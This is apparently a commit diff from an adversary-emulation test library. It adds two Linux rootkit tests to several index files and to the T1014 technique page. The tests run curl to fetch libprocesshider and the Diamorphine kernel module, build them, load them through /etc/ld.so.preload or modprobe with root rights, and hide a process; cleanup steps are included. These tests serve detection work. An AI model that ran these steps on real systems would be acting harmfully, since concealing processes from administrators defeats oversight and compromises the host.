Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -28,6 +28,8 @@ defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
 defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -14,6 +14,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
+defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
+defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh

atomics/Indexes/Indexes-Markdown/index.md

@@ -43,6 +43,8 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
   - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+  - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+  - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
 - T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -22,6 +22,8 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
   - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
+  - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
+  - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
 - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
   - Atomic Test #1: Sudo usage [macos, linux]

atomics/Indexes/index.yaml

@@ -1712,6 +1712,104 @@ defense-evasion:
           sudo depmod -a
         name: sh
         elevation_required: true
+    - name: dynamic-linker based rootkit (libprocesshider)
+      auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+      description: 'Uses libprocesshider to simulate rootkit behavior by hiding a
+        specific process name via ls.so.preload (see also T1574.006).
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        repo:
+          description: Url of the github repo zip
+          type: String
+          default: https://github.com/gianlucaborello/libprocesshider/
+        rev:
+          description: Revision of the github repo zip
+          type: String
+          default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
+        library_path:
+          description: Full path of the library to add to ld.so.preload
+          type: String
+          default: "/usr/local/lib/libprocesshider.so"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'The preload library must exist on disk at specified location
+          (#{library_path})
+
+          '
+        prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+
+          '
+        get_prereq_command: |
+          mkdir -p /tmp/atomic && cd /tmp/atomic
+          curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+          make
+          cp libprocesshider.so #{library_path}
+          cp /usr/bin/ping /usr/local/bin/evil_script.py
+      executor:
+        command: |
+          echo #{library_path} | tee -a /etc/ld.so.preload
+          /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+        cleanup_command: |
+          sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+          rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+        name: sh
+        elevation_required: true
+    - name: Loadable Kernel Module based Rootkit (Diamorphine)
+      auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247
+      description: 'Loads Diamorphine kernel module, which hides itself and a processes.
+
+        '
+      supported_platforms:
+      - linux
+      input_arguments:
+        repo:
+          description: Url of the diamorphine github repo
+          type: String
+          default: https://github.com/m0nad/Diamorphine/
+        rev:
+          description: Revision of the github repo zip
+          type: String
+          default: 898810523aa2033f582a4a5903ffe453334044f9
+        rootkit_path:
+          description: Path To rootkit
+          type: String
+          default: "/tmp/atomic/Diamorphine"
+        rootkit_name:
+          description: Module name
+          type: String
+          default: diamorphine
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+
+          '
+        prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then
+          exit 0; else exit 1; fi;
+
+          '
+        get_prereq_command: |
+          mkdir -p /tmp/atomic && cd /tmp/atomic
+          curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+          make
+          sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+          sudo depmod -a
+      executor:
+        command: |
+          sudo modprobe #{rootkit_name}
+          ping -c 10 localhost >/dev/null & TARGETPID="$!"
+          ps $TARGETPID
+          kill -31 $TARGETPID
+          ps $TARGETPID || echo "process ${TARGETPID} hidden"
+        cleanup_command: |
+          kill -63 1
+          sudo modprobe -r #{rootkit_name}
+          sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+          sudo depmod -a
+        name: sh
+        elevation_required: true
   T1109:
     technique:
       x_mitre_platforms:

atomics/T1014/T1014.md

@@ -10,6 +10,10 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
 
 - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
 
+- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider)
+
+- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine)
+
 
 <br/>
 
@@ -129,4 +133,124 @@ sudo depmod -a
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)
+Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006).
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/|
+| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415|
+| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+echo #{library_path} | tee -a /etc/ld.so.preload
+/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"
+```
+
+#### Cleanup Commands:
+```sh
+sed -i "\:^#{library_path}:d" /etc/ld.so.preload
+rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: The preload library must exist on disk at specified location (#{library_path})
+##### Check Prereq Commands:
+```bash
+if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
+make
+cp libprocesshider.so #{library_path}
+cp /usr/bin/ping /usr/local/bin/evil_script.py
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)
+Loads Diamorphine kernel module, which hides itself and a processes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/|
+| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9|
+| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine|
+| rootkit_name | Module name | String | diamorphine|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo modprobe #{rootkit_name}
+ping -c 10 localhost >/dev/null & TARGETPID="$!"
+ps $TARGETPID
+kill -31 $TARGETPID
+ps $TARGETPID || echo "process ${TARGETPID} hidden"
+```
+
+#### Cleanup Commands:
+```sh
+kill -63 1
+sudo modprobe -r #{rootkit_name}
+sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
+sudo depmod -a
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
+##### Check Prereq Commands:
+```bash
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+mkdir -p /tmp/atomic && cd /tmp/atomic
+curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
+make
+sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
+sudo depmod -a
+```
+
+
+
+
 <br/>